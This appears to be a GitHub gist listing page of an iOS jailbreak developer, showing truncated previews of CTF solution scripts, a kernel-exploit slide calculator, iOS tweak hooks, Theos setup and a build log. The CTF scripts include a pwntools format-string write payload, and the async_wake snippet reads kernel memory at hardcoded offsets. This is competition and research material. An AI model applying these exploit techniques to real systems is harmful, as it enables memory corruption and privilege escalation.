George Dan ninjaprawn

@ninjaprawn
ninjaprawn / exp_neo_boffy.py
Created Jul 17, 2018
Solution to Neo Boffy from the BSides Canberra CTF 2018
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
context(log_level="ERROR")
# Can't send NULLs, but can send empty strings
def cmdify(str): return str.split("\x00")
@ninjaprawn
ninjaprawn / dsc_changes
Created Jun 4, 2018
Changes in the iOS 12 dsc
Added:
- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
- /System/Library/Frameworks/CarPlay.framework/CarPlay
- /System/Library/Frameworks/CoreServices.framework/CoreServices
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
- /System/Library/Frameworks/GLKit.framework/GLKit
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage
@ninjaprawn
ninjaprawn / exp_fat_morphine.py
Created May 31, 2018
Solution to Fat Morphine from the BSides Canberra CTF 2018
from pwn import *
bin_path = "./fat_morphine"
payload = ""
payload += "%4196134x" # What we are writing
payload += "%{}$lln" # How we write it
payload += "\x30\x0d\x60" # Where we write it
payload = payload.format(10)
@ninjaprawn
ninjaprawn / slide.c
Last active Dec 12, 2017
async_wake_ios slide calculator - based on Siguza's v0rtex method of calculating the slide
/*
Offsets from iOS 11.1.2 iPhone 6+
Insert the following after line 680 in async_wait.c
Mostly from Siguza's v0rtex
*/
mach_ports_register(mach_task_self(), &user_client, 1);
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);
ninjaprawn / installing theos
brew install dpkg ldid
cd ~
git clone --recursive https://github.com/theos/theos.git
echo "export THEOS=~/theos" >> .bash_profile
ninjaprawn / limitless301016.log
Showing All Messages
Build target Limitless of project Limitless with configuration Debug
PhaseScriptExecution Symlinks\ Setup /Users/ninja/Library/Developer/Xcode/DerivedData/Limitless-ffaafdspyfyrqgberifhaiobmnbg/Build/Intermediates/Limitless.build/Debug-iphoneos/Limitless.build/Script-FA25322E1DE0FB2800D4FA86.sh
cd /Volumes/Files/Developer/Limitless
export ACTION=build
export AD_HOC_CODE_SIGNING_ALLOWED=NO
export ALTERNATE_GROUP=staff
ninjaprawn / wtf.xm
...
@property (strong, nonatomic) NSString *currentPhoneNumber;
...
-(NSMutableArray*)getHiddenNumbers {
NSArray *hiddenNumbers = [[NSUserDefaults standardUserDefaults] objectForKey:@"hiddenNumbers"];
if (hiddenNumbers == nil) {
return [[NSMutableArray alloc] init];
}
return [NSMutableArray arrayWithArray:hiddenNumbers];
}
@ninjaprawn
ninjaprawn / privateclassaccessability
Created Dec 24, 2015
List of private classes/functions that can be accessed magically
SBUIController - NO (Protected by FrontBoard)
SBIconController - NO (Protected by FrontBoard)
SBPowerDownController - YES (assertion failure in -[SBPowerDownController _screen])
SBWallpaperController - NO (Protected by FrontBoard)
SpringBoard (actual app) - YES (Not sure how to fetch, Only one UIApp can be active at one time)
@ninjaprawn
ninjaprawn / record.xm
Created Oct 24, 2015
random attempt to record screen
%hook BSPlatform
- (BOOL)isInternalInstall {
return YES;
}
%end
@ninjaprawn
ninjaprawn / tweak.xm
Last active Aug 10, 2016
it was greeny D:
@interface SBApplicationController
+(id)sharedInstance;
-(id)applicationWithBundleIdentifier:(id)arg1 ;
@end
@interface SBApplication
@end
@interface SBApplicationIcon : NSObject
-(id)initWithApplication:(id)arg1 ;